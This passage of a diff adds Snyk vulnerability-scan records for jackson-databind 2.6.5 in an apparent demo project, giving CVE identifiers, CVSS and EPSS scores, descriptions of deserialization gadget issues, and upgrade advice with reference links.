An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n", + "epssDetails": { + "percentile": "0.80006", + "probability": "0.00674", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35728" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-27T14:34:18.527699Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": 
"2020-12-27T14:05:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-27T17:34:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.852735Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": 
"https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.093517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36187" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T12:47:33.579319Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T12:44:41Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": 
"jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.970819Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.768509Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36184", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.169091Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36184" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:02:15.197495Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2021-01-07T16:40:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.700251Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "cvssSources": 
[ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.214306Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36186" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:05:16.831143Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.206083Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.695573Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": 
"high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.249724Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36180" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:08:29.105792Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:05:51Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.705041Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
